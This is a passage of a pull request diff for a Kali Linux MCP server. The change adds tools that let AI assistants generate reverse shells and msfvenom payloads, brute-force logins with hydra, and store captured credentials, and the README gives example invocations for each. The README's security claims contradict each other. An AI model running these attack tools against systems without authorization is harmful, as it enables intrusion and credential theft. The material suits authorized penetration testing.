### PR TITLE
Tooling upgrades

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -4,85 +4,74 @@ This file provides guidance to Claude Code (claude.ai/code) when working with co
 
 ## Project Overview
 
-This is a production-ready MCP (Model Context Protocol) server running in a Kali Linux Docker container. It provides AI assistants with access to a comprehensive security toolset for penetration testing and security analysis. The server communicates via Server-Sent Events (SSE) and allows AI to execute commands in a controlled environment.
+MCP (Model Context Protocol) server running in a Kali Linux Docker container. Provides AI assistants with access to security tools (nmap, nikto, sqlmap, gobuster, etc.) via SSE or stdio transport. Built on the `mcp` Python SDK using the low-level `Server` API.
 
 ## Commands
 
-### Building and Running
-
 ```bash
-# Build the Docker image
-docker build -t kali-mcp-server .
+# Build and run Docker container (SSE mode, port 8000)
+./run_docker.sh
+# Or manually:
+docker build -t kali-mcp-server . && docker run -p 8000:8000 kali-mcp-server
 
-# Run with default settings (SSE mode on port 8000)
-docker run -p 8000:8000 kali-mcp-server
-
-# Run the tests
+# Run all checks (type checking, linting, tests)
 ./run_tests.sh
 
-# Quick build and run
-./run_docker.sh
-```
+# Individual dev commands
+pyright                          # Type checking
+ruff check .                     # Linting
+ruff format .                    # Formatting
+pytest                           # All tests
+pytest tests/test_tools.py       # Single test file
+pytest tests/test_tools.py::test_is_command_allowed  # Single test
+pytest -k "session"              # Tests matching pattern
 
-### Development Commands
-
-```bash
-# Install development dependencies
+# Install dev dependencies
 pip install -e ".[dev]"
-
-# Type checking
-pyright
-
-# Linting
-ruff check .
-
-# Formatting
-ruff format .
-
-# Running tests
-pytest
-```
-
-### Package Management
-
-```bash
-# Install dependencies
-pip install -r requirements.txt
-
-# Add a new dependency
-pip install <package-name>
 ```
 
 ## Architecture
 
-The project is structured as a Python MCP server with three main components:
+### Core Files
 
-1. `kali_mcp_server/server.py` - Core server implementation that handles MCP protocol
-2. `kali_mcp_server/tools.py` - Implementation of the tools offered by the server
-3. Main entry points: `main.py` and `kali_mcp_server/__main__.py`
+- **`kali_mcp_server/server.py`** — Server setup, transport config (SSE via Starlette/uvicorn, or stdio), and **tool dispatch**. The `handle_tool_request()` function routes tool calls via an if/elif chain; `list_available_tools()` registers tool schemas with MCP.
+- **`kali_mcp_server/tools.py`** — All tool implementations. Contains the `ALLOWED_COMMANDS` allowlist and session management backend.
+- **`main.py`** and **`kali_mcp_server/__main__.py`** — Entry points (both delegate to `server.main()`).
 
-The server provides three main tools through the MCP protocol:
+### Adding a New Tool
 
-1. `run` - Execute shell commands in the Kali Linux environment
-2. `fetch` - Fetch web content from specified URLs
-3. `resources` - List available system resources and command examples
+New tools require changes in **three places**:
+1. Implement the async function in `tools.py`
+2. Add routing in `handle_tool_request()` in `server.py` (the if/elif dispatch)
+3. Add the tool schema in `list_available_tools()` in `server.py` (returns `types.Tool` with `inputSchema`)
+4. Import the function in `server.py`
 
-Commands are validated against an allowlist for security, and long-running commands are executed in the background.
+### Command Security Model
 
-The Docker container is based on Kali Linux and includes a wide range of pre-installed security tools:
-- Network scanning (nmap)
-- Penetration testing (metasploit)
-- Password brute-forcing (hydra)
-- Directory enumeration (gobuster, dirb)
-- Web vulnerability scanning (nikto)
-- SQL injection testing (sqlmap)
+`tools.py` defines `ALLOWED_COMMANDS` — a list of `(command_prefix, is_long_running)` tuples. The `is_command_allowed()` function checks commands against this allowlist by prefix matching. Shell metacharacters (`;`, `&`, `|`) are stripped from input. Long-running commands (nmap, nikto, etc.) are automatically backgrounded with output redirected to files.
 
-The container is configured to run as a non-root user for improved security.
+### Session Management
 
-## Integration with Claude Desktop
+File-based session system under `sessions/` directory. Each session gets a subdirectory with a `metadata.json` file storing name, description, target, timestamps, and command history. Active session tracked via `sessions/active_session.txt`.
 
-The MCP server is designed to be used with Claude Desktop by adding a configuration entry to:
-`~/Library/Application Support/Claude/claude_desktop_config.json`
+### Transport Modes
+
+- **SSE** (default): Starlette app with `/sse` endpoint and `/messages/` mount. Used with Claude Desktop.
+- **stdio**: Direct stdin/stdout communication via `anyio.run`.
+
+Select with `--transport sse|stdio` and `--port` (default 8000).
+
+### Testing
+
+Tests use `pytest-asyncio`. Server tests mock tool functions via `unittest.mock.patch` on `kali_mcp_server.server.<function_name>`. Tool tests call implementations directly (some require filesystem side effects like session creation).
+
+### Docker
+
+Based on `kalilinux/kali-rolling`. Runs as non-root `mcpuser`. Includes Go toolchain for `waybackurls`. Python runs in a venv at `/app/venv`. Pre-installs: nmap, metasploit, hydra, gobuster, dirb, nikto, sqlmap, testssl.sh, amass, httpx-toolkit, subfinder, gospider.
+
+## Claude Desktop Integration
+
+Add to `~/Library/Application Support/Claude/claude_desktop_config.json`:
 
 ```json
 {
@@ -95,16 +84,3 @@ The MCP server is designed to be used with Claude Desktop by adding a configurat
   }
 }
 ```
-
-See CLAUDE_INTEGRATION.md for detailed integration instructions.
-
-## Security Note
-
-This container provides access to powerful security tools. It includes several security measures:
-
-1. Commands are validated against an allowlist
-2. The server runs as a non-root user inside the container
-3. Long-running commands are executed with appropriate controls
-4. Input validation is applied to commands and URLs
-
-It should only be used responsibly and in controlled environments.

--- a/Dockerfile
+++ b/Dockerfile
@@ -27,6 +27,10 @@ RUN apt-get update && apt-get install -y \
     subfinder \
     gospider \
     golang \
+    smbclient \
+    enum4linux \
+    nfs-common \
+    hashid \
     && apt-get clean \
     && rm -rf /var/lib/apt/lists/*
 

--- a/README.md
+++ b/README.md
@@ -1,446 +1,370 @@
-# 🛡️ Kali MCP Server
+# Kali MCP Server
 
-A production-ready MCP (Model Context Protocol) server running in a Kali Linux Docker container, providing AI assistants with access to a comprehensive security toolset.
+A production-ready MCP (Model Context Protocol) server running in a Kali Linux Docker container, providing AI assistants with access to 35 security tools covering the full offensive security lifecycle.
 
 [![Kali Linux](https://img.shields.io/badge/Kali_Linux-557C94?style=for-the-badge&logo=kali-linux&logoColor=white)](https://www.kali.org/)
 [![Docker](https://img.shields.io/badge/Docker-2496ED?style=for-the-badge&logo=docker&logoColor=white)](https://www.docker.com/)
 [![Python](https://img.shields.io/badge/Python-3776AB?style=for-the-badge&logo=python&logoColor=white)](https://www.python.org/)
 
-## 📋 Overview
+## Overview
 
-This project provides a Docker containerized MCP server that runs on Kali Linux, giving AI assistants (like Claude) access to a full suite of security and penetration testing tools. The server communicates via Server-Sent Events (SSE) and allows AI to execute commands in a controlled environment with appropriate security measures.
+This project provides a Docker containerized MCP server that runs on Kali Linux, giving AI assistants (like Claude) access to a full suite of security and penetration testing tools. The server communicates via Server-Sent Events (SSE) or stdio and allows AI to execute commands in a controlled environment.
 
-## ✨ Features
+## Quick Start
 
-- **🔒 Security Tools Access**: Full access to Kali Linux security toolset through a controlled interface
-- **🛡️ Command Validation**: Commands are validated against an allowlist for security
-- **🌐 Web Content Fetching**: Retrieve and analyze web content
-- **📊 Resource Information**: Comprehensive system resource details and command examples
-- **👤 Security Focus**: Running as non-root user with appropriate permissions
-
-### 🔧 Pre-installed Security Tools
-
-- **🔍 Network Scanning**: nmap, netcat
-- **🕸️ Web Application Testing**: nikto, gobuster, dirb
-- **🧪 Penetration Testing**: metasploit-framework
-- **🔑 Credential Testing**: hydra
-- **💉 Data Extraction**: sqlmap
-- **ℹ️ Information Gathering**: whois, dig, host
-
-## 🚀 Quick Start
-
-### 🐳 Building and Running the Container
+### Building and Running the Container
 
 ```bash
 # Quick start with the helper script
 ./run_docker.sh
 
 # Or manually:
-# Build the Docker image
 docker build -t kali-mcp-server .
-
-# Run with default settings (SSE mode on port 8000)
 docker run -p 8000:8000 kali-mcp-server
 ```
 
-### 🔌 Connecting to Claude Desktop
+### Connecting to Claude Desktop
 
-1. Edit your Claude Desktop config file:
-   - Location: `~/Library/Application Support/Claude/claude_desktop_config.json`
-   - Add this configuration:
-     ```json
-     {
-       "mcpServers": {
-         "kali-mcp-server": {
-           "transport": "sse",
-           "url": "http://localhost:8000/sse",
-           "command": "docker run -p 8000:8000 kali-mcp-server"
-         }
-       }
-     }
-     ```
+1. Edit your Claude Desktop config file at `~/Library/Application Support/Claude/claude_desktop_config.json`:
+
+```json
+{
+  "mcpServers": {
+    "kali-mcp-server": {
+      "transport": "sse",
+      "url": "http://localhost:8000/sse",
+      "command": "docker run -p 8000:8000 kali-mcp-server"
+    }
+  }
+}
+```
 
 2. Restart Claude Desktop
-3. Test the connection with a simple command:
-   ```
-   /run nmap -F localhost
-   ```
+3. Test with: `/run nmap -F localhost`
 
-## 🛠️ Available MCP Tools
+## Available MCP Tools (35)
 
-The server provides several tools through the MCP protocol:
+### Core Tools
 
-### 💻 `run` - Execute Commands
+| Tool | Description |
+|------|-------------|
+| `run` | Execute shell commands in the Kali Linux environment |
+| `fetch` | Fetch and analyze web content from URLs |
+| `resources` | List available system resources and command examples |
 
-Run security tools and commands in the Kali Linux environment.
+### Reconnaissance & Scanning
+
+| Tool | Description |
+|------|-------------|
+| `port_scan` | Smart nmap wrapper with scan presets (quick, full, stealth, udp, service, aggressive) |
+| `dns_enum` | Comprehensive DNS enumeration with zone transfer attempts |
+| `network_discovery` | Multi-stage network reconnaissance and discovery |
+| `subdomain_enum` | Subdomain enumeration using subfinder, amass, waybackurls |
+| `recon_auto` | Automated multi-stage reconnaissance pipeline |
+
+### Web Application Testing
+
+| Tool | Description |
+|------|-------------|
+| `vulnerability_scan` | Automated vulnerability assessment with multiple tools |
+| `web_enumeration` | Web application discovery and enumeration |
+| `web_audit` | Comprehensive web application security audit |
+| `spider_website` | Web crawling and spidering using gospider |
+| `form_analysis` | Discover and analyze web forms |
+| `header_analysis` | HTTP header security analysis |
+| `ssl_analysis` | SSL/TLS security assessment using testssl.sh |
+
+### Credential & Brute-Force Attacks
+
+| Tool | Description |
+|------|-------------|
+| `hydra_attack` | Brute-force credential testing via hydra (SSH, FTP, HTTP, SMB, MySQL, RDP, etc.) |
+| `credential_store` | Store/retrieve discovered credentials tied to sessions |
+
+### Payload & Exploit Tools
+
+| Tool | Description |
+|------|-------------|
+| `payload_generate` | Generate payloads using msfvenom (reverse shell, bind shell, meterpreter) |
+| `reverse_shell` | Generate reverse shell one-liners for bash, python, php, perl, powershell, nc, ruby, java |
+| `exploit_search` | Search for exploits using searchsploit |
+
+### Encoding & Hash Tools
+
+| Tool | Description |
+|------|-------------|
+| `encode_decode` | Multi-format encoding/decoding (base64, URL, hex, HTML, ROT13) |
+| `hash_identify` | Identify hash types with Hashcat mode and John format lookup |
+
+### Share Enumeration
+
+| Tool | Description |
+|------|-------------|
+| `enum_shares` | SMB/NFS share enumeration (smbclient, enum4linux, showmount) |
+
+### Output Parsing
+
+| Tool | Description |
+|------|-------------|
+| `parse_nmap` | Parse nmap text/XML output into structured JSON findings |
+| `parse_tool_output` | Parse output from nikto, gobuster, dirb, hydra, or sqlmap |
+
+### Evidence & Reporting
+
+| Tool | Description |
+|------|-------------|
+| `save_output` | Save content to timestamped files for evidence collection |
+| `create_report` | Generate structured reports (markdown, text, JSON) |
+| `file_analysis` | Analyze files (type detection, strings, hashes, metadata) |
+| `download_file` | Download files from URLs with hash verification |
+
+### Session Management
+
+| Tool | Description |
+|------|-------------|
+| `session_create` | Create a new pentest session |
+| `session_list` | List all sessions with metadata |
+| `session_switch` | Switch between sessions |
+| `session_status` | Show current session status |
+| `session_delete` | Delete a session and its evidence |
+| `session_history` | Show command history for current session |
+
+---
+
+## Tool Details
+
+### `port_scan` - Smart Nmap Wrapper
+
+Runs nmap with predefined scan presets, generating both text and XML output.
 
 ```
-/run nmap -F localhost
+/port_scan target=192.168.1.1 scan_type=quick
+/port_scan target=10.0.0.0/24 scan_type=aggressive ports=80,443,8080
 ```
 
-Commands are validated against an allowlist for security. Long-running commands will be executed in the background with results saved to an output file.
+**Scan Presets:**
+| Preset | Nmap Flags |
+|--------|-----------|
+| `quick` | `-F -sV` |
+| `full` | `-sS -sV -p-` |
+| `stealth` | `-sS -T2 --max-retries 1` |
+| `udp` | `-sU --top-ports 100` |
+| `service` | `-sV --version-intensity 5 -sC` |
+| `aggressive` | `-A -T4` |
 
-### 🌐 `fetch` - Retrieve Web Content
+### `dns_enum` - DNS Enumeration
 
-Fetch and analyze web content from specified URLs.
+Queries all DNS record types and attempts zone transfers.
 
 ```
-/fetch https://example.com
+/dns_enum domain=example.com
+/dns_enum domain=target.com record_types=a,mx,ns,txt
 ```
 
-### 📈 `resources` - List Available Resources
+### `recon_auto` - Automated Recon Pipeline
 
-Get information about the system and available commands. (The AI can use these resources to run the commands on you behalf using Natural Language.)
+Runs a multi-stage reconnaissance pipeline with configurable depth.
 
 ```
-/resources
+/recon_auto target=example.com depth=quick
+/recon_auto target=10.0.0.1 depth=standard
+/recon_auto target=target.com depth=deep
 ```
 
-### 🚀 `vulnerability_scan` - Automated Vulnerability Assessment
+**Depth Levels:**
+| Depth | Phases |
+|-------|--------|
+| `quick` | DNS enumeration, quick port scan, header analysis |
+| `standard` | + service scan, SSL analysis, exploit search |
+| `deep` | + subdomain enumeration, web enumeration, vulnerability scan |
 
-Perform automated vulnerability assessment with multiple tools.
+### `hydra_attack` - Brute-Force Testing
+
+```
+/hydra_attack target=192.168.1.1 service=ssh username=admin passlist=/usr/share/wordlists/rockyou.txt
+/hydra_attack target=10.0.0.1 service=ftp userlist=users.txt passlist=passwords.txt threads=32
+```
+
+**Supported Services:** ssh, ftp, http-get, http-post-form, smb, mysql, rdp, telnet, vnc, pop3, imap, smtp
+
+### `payload_generate` - Msfvenom Payloads
+
+```
+/payload_generate payload_type=reverse_shell platform=linux lhost=10.0.0.1 lport=4444 format=elf
+/payload_generate payload_type=meterpreter platform=windows lhost=10.0.0.1 format=exe
+```
+
+**Payload Types:** reverse_shell, bind_shell, meterpreter
+**Platforms:** linux, windows, osx, php, python
+**Formats:** elf, exe, raw, python, php, war
+
+### `reverse_shell` - Shell One-Liners
+
+Generates ready-to-use reverse shell commands with listener hints.
+
+```
+/reverse_shell lhost=10.0.0.1 shell_type=bash lport=4444
+/reverse_shell lhost=10.0.0.1 shell_type=python lport=9999
+```
+
+**Shell Types:** bash, python, php, perl, powershell, nc, ruby, java
+
+### `encode_decode` - Encoding Utility
+
+```
+/encode_decode data="hello world" operation=encode format=base64
+/encode_decode data="aGVsbG8gd29ybGQ=" operation=decode format=base64
+/encode_decode data="<script>alert(1)</script>" operation=encode format=html
+```
+
+**Formats:** base64, url, hex, html, rot13
+
+### `hash_identify` - Hash Identification
+
+Identifies hash types by regex and returns Hashcat mode numbers and John format names.
+
+```
+/hash_identify hash_value=5d41402abc4b2a76b9719d911017c592
+/hash_identify hash_value=$2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ012345
+```
+
+**Supported Types:** MD5, SHA-1, SHA-256, SHA-512, bcrypt, SHA-512/256/MD5 Crypt, NTLM, Apache APR1, MySQL, Django
+
+### `enum_shares` - Share Enumeration
+
+```
+/enum_shares target=192.168.1.1 enum_type=all
+/enum_shares target=10.0.0.1 enum_type=smb username=admin password=pass
+```
+
+**Enum Types:** smb (smbclient + enum4linux), nfs (showmount), all
+
+### `credential_store` - Credential Management
+
+Stores discovered credentials as JSON tied to the active session.
+
+```
+/credential_store action=add username=admin password=pass123 service=ssh target=10.0.0.1
+/credential_store action=list
+/credential_store action=search username=admin
+```
+
+### `parse_nmap` - Nmap Output Parser
+
+Parses both text and XML nmap output into structured JSON with hosts, open ports, services, OS detection, and script output.
+
+```
+/parse_nmap filepath=port_scan_10_0_0_1_quick_20240101_120000.txt
+/parse_nmap filepath=scan_results.xml
+```
+
+### `parse_tool_output` - Generic Output Parser
+
+Auto-detects and parses output from nikto, gobuster, dirb, hydra, or sqlmap.
+
+```
+/parse_tool_output filepath=nikto_results.txt
+/parse_tool_output filepath=gobuster_output.txt tool_type=gobuster
+```
+
+### `vulnerability_scan`
 
 ```
 /vulnerability_scan target=127.0.0.1 scan_type=quick
 /vulnerability_scan target=example.com scan_type=comprehensive
 ```
 
-**Scan Types:**
-- `quick`: Fast scan with nmap and nikto
-- `comprehensive`: Full scan with multiple tools
-- `web`: Web-focused vulnerability assessment
-- `network`: Network-focused vulnerability assessment
+**Scan Types:** quick, comprehensive, web, network
 
-### 🌐 `web_enumeration` - Web Application Discovery
-
-Perform comprehensive web application discovery and enumeration.
+### `web_enumeration`
 
 ```
 /web_enumeration target=http://example.com enumeration_type=full
-/web_enumeration target=example.com enumeration_type=aggressive
 ```
 
-**Enumeration Types:**
-- `basic`: Basic web enumeration with nikto and gobuster
-- `full`: Comprehensive enumeration including vhost discovery
-- `aggressive`: Aggressive enumeration with SQL injection testing
+**Types:** basic, full, aggressive
 
-### 🔍 `network_discovery` - Network Reconnaissance
-
-Perform multi-stage network reconnaissance and discovery.
+### `network_discovery`
 
 ```
 /network_discovery target=192.168.1.0/24 discovery_type=comprehensive
-/network_discovery target=example.com discovery_type=stealth
 ```
 
-**Discovery Types:**
-- `quick`: Quick network discovery
-- `comprehensive`: Comprehensive network mapping
-- `stealth`: Stealthy network reconnaissance
-
-### 🔍 `exploit_search` - Exploit Database Search
-
-Search for exploits using searchsploit and other exploit databases.
-
-```
-/exploit_search search_term=apache search_type=web
-/exploit_search search_term=CVE-2021-44228 search_type=all
-```
-
-**Search Types:**
-- `all`: Search all exploit types
-- `web`: Web application exploits
-- `remote`: Remote exploits
-- `local`: Local exploits
-- `dos`: Denial of service exploits
-
-### 💾 `save_output` - Save Content to File
-
-Save content to a timestamped file for evidence collection.
-
-```
-/save_output content="Scan results here" filename=my_scan category=scan
-/save_output content="Enumeration data" category=enum
-```
-
-**Categories:**
-- `general`: General content (default)
-- `scan`: Vulnerability scan results
-- `enum`: Enumeration results
-- `evidence`: Evidence collection
-
-### 📋 `create_report` - Generate Structured Reports
-
-Generate a structured report from findings.
-
-```
-/create_report title="Security Assessment Report" findings="Vulnerabilities found..." report_type=markdown
-/create_report title="Network Scan Results" findings="Open ports..." report_type=json
-```
-
-**Report Types:**
-- `markdown`: Markdown format (default)
-- `text`: Plain text format
-- `json`: JSON format
-
-### 🔍 `file_analysis` - Analyze Files
-
-Analyze a file using various tools (file type, strings, hash).
-
-```
-/file_analysis filepath=./suspicious_file
-/file_analysis filepath=/path/to/downloaded/file
-```
-
-**Analysis includes:**
-- File type detection
-- String extraction
-- SHA256 hash
-- File metadata
-- Content preview
-
-### 📥 `download_file` - Download Files
-
-Download a file from a URL and save it locally.
-
-```
-/download_file url=https://example.com/file.txt filename=downloaded_file
-/download_file url=https://example.com/script.sh
-```
-
-**Features:**
-- Automatic filename extraction from URL
-- SHA256 hash generation
-- Content-type detection
-- Safe filename sanitization
-
-### 🗂️ `session_create` - Create New Session
-
-Create a new pentest session with name, description, and target.
-
-```
-/session_create session_name="web_app_test" description="Web application security assessment" target="example.com"
-/session_create session_name="network_scan" target="192.168.1.0/24"
-```
-
-**Features:**
-- Session metadata storage
-- Automatic session activation
-- Organized file structure
-
-### 📋 `session_list` - List Sessions
-
-List all pentest sessions with metadata and status.
-
-```
-/session_list
-```
-
-**Shows:**
-- All available sessions
-- Active session indicator
-- Session descriptions and targets
-- Creation dates and history counts
-
-### 🔄 `session_switch` - Switch Sessions
-
-Switch to a different pentest session.
-
-```
-/session_switch session_name="web_app_test"
-```
-
-**Features:**
-- Validates session existence
-- Updates active session
-- Shows session details after switch
-
-### 📊 `session_status` - Session Status
-
-Show current session status and summary.
-
-```
-/session_status
-```
-
-**Shows:**
-- Active session details
-- Session metadata
-- File count and history
-- Recent activity
-
-### 🗑️ `session_delete` - Delete Session
-
-Delete a pentest session and all its evidence.
-
-```
-/session_delete session_name="old_session"
-```
-
-**Safety Features:**
-- Cannot delete active session
-- Confirms deletion with session details
-- Removes all session files and evidence
-
-### 📜 `session_history` - Session History
-
-Show command/evidence history for the current session.
-
-```
-/session_history
-```
-
-**Shows:**
-- Chronological history of activities
-- Action types and timestamps
-- Session-specific evidence tracking
-
-## Enhanced Web Application Testing Tools
-
-### 🕷️ Spider Website
-Comprehensive web crawling and spidering using gospider.
-
-```bash
-/spider_website url=https://example.com depth=2 threads=10
-```
-
-**Parameters:**
-- `url` (required): Target URL to spider
-- `depth` (optional): Crawling depth (default: 2)
-- `threads` (optional): Number of concurrent threads (default: 10)
-
-### 📝 Form Analysis
-Discover and analyze web forms for security testing.
-
-```bash
-/form_analysis url=https://example.com scan_type=comprehensive
-```
-
-**Parameters:**
-- `url` (required): Target URL to analyze
-- `scan_type` (optional): Type of analysis - "basic", "comprehensive", "aggressive" (default: "comprehensive")
-
-### 📋 Header Analysis
-Analyze HTTP headers for security information and misconfigurations.
-
-```bash
-/header_analysis url=https://example.com include_security=true
-```
-
-**Parameters:**
-- `url` (required): Target URL to analyze
-- `include_security` (optional): Include security header analysis (default: true)
-
-### 🔐 SSL Analysis
-Perform SSL/TLS security assessment using testssl.sh.
-
-```bash
-/ssl_analysis url=example.com port=443
-```
-
-**Parameters:**
-- `url` (required): Target URL to analyze
-- `port` (optional): SSL port (default: 443)
-
-### 🔍 Subdomain Enumeration
-Perform subdomain enumeration using multiple tools (subfinder, amass, waybackurls).
-
-```bash
-/subdomain_enum url=example.com enum_type=comprehensive
-```
-
-**Parameters:**
-- `url` (required): Target domain to enumerate
-- `enum_type` (optional): Type of enumeration - "basic", "comprehensive", "aggressive" (default: "comprehensive")
-
-### 🔍 Web Audit
-Perform comprehensive web application security audit.
-
-```bash
-/web_audit url=https://example.com audit_type=comprehensive
-```
-
-**Parameters:**
-- `url` (required): Target URL to audit
-- `audit_type` (optional): Type of audit - "basic", "comprehensive", "aggressive" (default: "comprehensive")
-
-**Tools Used in Web Audit:**
-- Nikto (web vulnerability scanner)
-- Gobuster (directory/vhost enumeration)
-- SQLMap (SQL injection testing)
-- Dirb (directory enumeration)
-- TestSSL.sh (SSL/TLS analysis)
-- Curl (header analysis)
-
-## Session Management Tools
-
-## ⚠️ Troubleshooting
-
-### 🔌 Connection Issues
-
-- Ensure port 8000 is available on your machine
-- Check that the Docker container is running: `docker ps`
-- Verify the URL in Claude Desktop configuration matches the container's port
-
-### ⚙️ Command Execution Problems
-
-- If commands timeout, try running them in the background: `command > output.txt &`
-- Use `/resources` to see examples of properly formatted commands
-- For permission errors, ensure you're not trying to access protected system areas
-
-## 🔒 Security Considerations
-
-This container provides access to powerful security tools. Please observe the following:
-
-- Use responsibly and only in controlled environments
-- The container is designed to be run locally and should not be exposed to the internet
-- Commands are validated against an allowlist for security
-- The server runs as a non-root user inside the container
-- Only use this tool for legitimate security testing with proper authorization
-
-## 📋 Requirements
+**Types:** quick, comprehensive, stealth
+
+---
+
+## Pre-installed Tools
+
+The Docker container includes the following tools, all enabled for use through the `run` command:
+
+| Category | Tools |
+|----------|-------|
+| **Network Scanning** | nmap, masscan, netcat, tcpdump, tshark |
+| **Web Testing** | nikto, gobuster, dirb, sqlmap, wfuzz, ffuf, feroxbuster, whatweb, wafw00f |
+| **Exploitation** | metasploit-framework (msfconsole, msfvenom), searchsploit |
+| **Credential Attacks** | hydra, hashcat, john |
+| **Information Gathering** | whois, dig, nslookup, amass, subfinder, theharvester, recon-ng, fierce, dnsenum, dnsrecon |
+| **Web Crawling** | gospider, waybackurls |
+| **Share Enumeration** | smbclient, enum4linux, showmount (nfs-common) |
+| **SSL/TLS** | testssl.sh, openssl |
+| **HTTP Probing** | httpx-toolkit, curl, wget |
+| **File Analysis** | file, strings, binwalk, exiftool, xxd, hexdump |
+| **Utilities** | python3, perl, ruby, php, git, base64, jq |
+
+All commands are allowed by default inside the container. The container itself is the security boundary - it runs as a non-root user with no access to the host filesystem.
+
+## Security Considerations
+
+- **Container isolation**: The server runs inside an isolated Docker container as non-root user `mcpuser`
+- **Input sanitization**: Shell metacharacters (`;`, `&`, `|`) are stripped from all command input
+- **No host access**: The container has no access to the host filesystem or network stack
+- **Authorization required**: Only use for legitimate security testing with proper authorization
+- **Local only**: The container should not be exposed to the internet
+
+## Requirements
 
 - Docker
-- Claude Desktop or other SSE enabled MCP clients
+- Claude Desktop or other MCP client (SSE or stdio)
 - Port 8000 available on your host machine
 
-## 👨‍💻 Development
+## Development
 
-### 🛠️ Setting Up a Development Environment
+### Setup
 
 ```bash
-# Clone the repository
 git clone https://github.com/yourusername/kali-mcp-server.git
 cd kali-mcp-server
 
-# Create a virtual environment
 python -m venv .venv
-source .venv/bin/activate  # On Windows: .venv\Scripts\activate
-
-# Install dependencies
-pip install -r requirements.txt
-
-# Install development dependencies
+source .venv/bin/activate
 pip install -e ".[dev]"
 ```
 
-### 🧪 Running Tests
+### Running Checks
 
 ```bash
-# Run tests with the helper script
+# All checks
 ./run_tests.sh
 
-# Or manually:
-# Run all tests
-pytest
-
-# Run with coverage
-pytest --cov=kali_mcp_server
+# Individual
+pyright                          # Type checking
+ruff check .                     # Linting
+ruff format .                    # Formatting
+pytest                           # All tests
+pytest tests/test_tools.py       # Single file
+pytest -k "session"              # Pattern match
 ```
 
+### Architecture
 
-## 🙏 Acknowledgements
+Adding a new tool requires changes in three places:
+
+1. **`kali_mcp_server/tools.py`** - Implement the async function
+2. **`kali_mcp_server/server.py`** - Add dispatch in `handle_tool_request()` and schema in `list_available_tools()`
+3. **`tests/`** - Add tests in both `test_tools.py` and `test_server.py`
+
+## Acknowledgements
 
 - Kali Linux for their security-focused distribution
 - Anthropic for Claude and the MCP protocol

--- a/kali_mcp_server/server.py
+++ b/kali_mcp_server/server.py
@@ -13,8 +13,8 @@ import mcp.types as types
 from mcp.server.lowlevel import Server
 
 from kali_mcp_server.tools import (
-    fetch_website, 
-    list_system_resources, 
+    fetch_website,
+    list_system_resources,
     run_command,
     vulnerability_scan,
     web_enumeration,
@@ -35,7 +35,19 @@ from kali_mcp_server.tools import (
     header_analysis,
     ssl_analysis,
     subdomain_enum,
-    web_audit
+    web_audit,
+    encode_decode,
+    reverse_shell,
+    hash_identify,
+    credential_store,
+    hydra_attack,
+    payload_generate,
+    port_scan,
+    dns_enum,
+    enum_shares,
+    parse_nmap,
+    parse_tool_output,
+    recon_auto,
 )
 
 # Create server instance with descriptive name
@@ -184,7 +196,107 @@ async def handle_tool_request(
             raise ValueError("Missing required argument 'url'")
         audit_type = arguments.get("audit_type", "comprehensive")
         return await web_audit(arguments["url"], audit_type)
-    
+
+    elif name == "encode_decode":
+        if "data" not in arguments:
+            raise ValueError("Missing required argument 'data'")
+        operation = arguments.get("operation", "encode")
+        fmt = arguments.get("format", "base64")
+        return await encode_decode(arguments["data"], operation, fmt)
+
+    elif name == "reverse_shell":
+        if "lhost" not in arguments:
+            raise ValueError("Missing required argument 'lhost'")
+        shell_type = arguments.get("shell_type", "bash")
+        lport = arguments.get("lport", 4444)
+        return await reverse_shell(arguments["lhost"], shell_type, lport)
+
+    elif name == "hash_identify":
+        if "hash_value" not in arguments:
+            raise ValueError("Missing required argument 'hash_value'")
+        return await hash_identify(arguments["hash_value"])
+
+    elif name == "credential_store":
+        action = arguments.get("action", "list")
+        return await credential_store(
+            action=action,
+            username=arguments.get("username"),
+            password=arguments.get("password"),
+            service=arguments.get("service"),
+            target=arguments.get("target"),
+            notes=arguments.get("notes"),
+        )
+
+    elif name == "hydra_attack":
+        if "target" not in arguments:
+            raise ValueError("Missing required argument 'target'")
+        return await hydra_attack(
+            target=arguments["target"],
+            service=arguments.get("service", "ssh"),
+            username=arguments.get("username"),
+            userlist=arguments.get("userlist"),
+            password=arguments.get("password"),
+            passlist=arguments.get("passlist"),
+            threads=arguments.get("threads", 16),
+            extra_opts=arguments.get("extra_opts", ""),
+        )
+
+    elif name == "payload_generate":
+        if "payload_type" not in arguments:
+            raise ValueError("Missing required argument 'payload_type'")
+        if "platform" not in arguments:
+            raise ValueError("Missing required argument 'platform'")
+        if "lhost" not in arguments:
+            raise ValueError("Missing required argument 'lhost'")
+        return await payload_generate(
+            payload_type=arguments["payload_type"],
+            platform=arguments["platform"],
+            lhost=arguments["lhost"],
+            lport=arguments.get("lport", 4444),
+            format=arguments.get("format", "raw"),
+            encoder=arguments.get("encoder"),
+        )
+
+    elif name == "port_scan":
+        if "target" not in arguments:
+            raise ValueError("Missing required argument 'target'")
+        scan_type = arguments.get("scan_type", "quick")
+        ports = arguments.get("ports")
+        return await port_scan(arguments["target"], scan_type, ports)
+
+    elif name == "dns_enum":
+        if "domain" not in arguments:
+            raise ValueError("Missing required argument 'domain'")
+        record_types = arguments.get("record_types", "all")
+        return await dns_enum(arguments["domain"], record_types)
+
+    elif name == "enum_shares":
+        if "target" not in arguments:
+            raise ValueError("Missing required argument 'target'")
+        return await enum_shares(
+            target=arguments["target"],
+            enum_type=arguments.get("enum_type", "all"),
+            username=arguments.get("username"),
+            password=arguments.get("password"),
+        )
+
+    elif name == "parse_nmap":
+        if "filepath" not in arguments:
+            raise ValueError("Missing required argument 'filepath'")
+        return await parse_nmap(arguments["filepath"])
+
+    elif name == "parse_tool_output":
+        if "filepath" not in arguments:
+            raise ValueError("Missing required argument 'filepath'")
+        tool_type = arguments.get("tool_type", "auto")
+        return await parse_tool_output(arguments["filepath"], tool_type)
+
+    elif name == "recon_auto":
+        if "target" not in arguments:
+            raise ValueError("Missing required argument 'target'")
+        depth = arguments.get("depth", "quick")
+        return await recon_auto(arguments["target"], depth)
+
     else:
         raise ValueError(f"Unknown tool: {name}")
 
@@ -585,6 +697,315 @@ async def list_available_tools() -> List[types.Tool]:
                         "description": "Type of audit (comprehensive, quick)",
                         "enum": ["comprehensive", "quick"],
                         "default": "comprehensive"
+                    }
+                },
+            },
+        ),
+        types.Tool(
+            name="encode_decode",
+            description="Multi-format encoding/decoding (base64, URL, hex, HTML, ROT13)",
+            inputSchema={
+                "type": "object",
+                "required": ["data"],
+                "properties": {
+                    "data": {
+                        "type": "string",
+                        "description": "The data to encode or decode",
+                    },
+                    "operation": {
